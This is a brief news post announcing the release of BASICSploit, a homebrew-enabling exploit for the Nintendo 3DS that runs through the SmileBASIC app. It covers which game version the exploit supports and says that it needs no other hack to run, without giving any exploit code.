3DS Hacker MrNbaYoh just released the BASICSploit, a homebrew-enabling hack that leverages app SmileBASIC on 3DS in order to run.

MrNbaYoh had announced the upcoming release a few days ago, recommending people interested in the hack to purchase the game SmileBASIC on the eShop ahead of the release. The game is available in the US and JP eShops, but not in Europe.

Today the exploit has been released. Note: The exploit is currently available only for the US version of the game in version 3.2.1, but we should expect ports of the exploit for the JP version as well as other updates of the App. This exploit differs from recent releases in that it is considered a “primary” exploit: you don’t need another hack running or the Action Replay Powersaves in order to install and run BASICSploit.

Running the exploit requires you to copy/paste (then run) a tiny “program” into SmileBASIC, which is a BASIC interpreter.
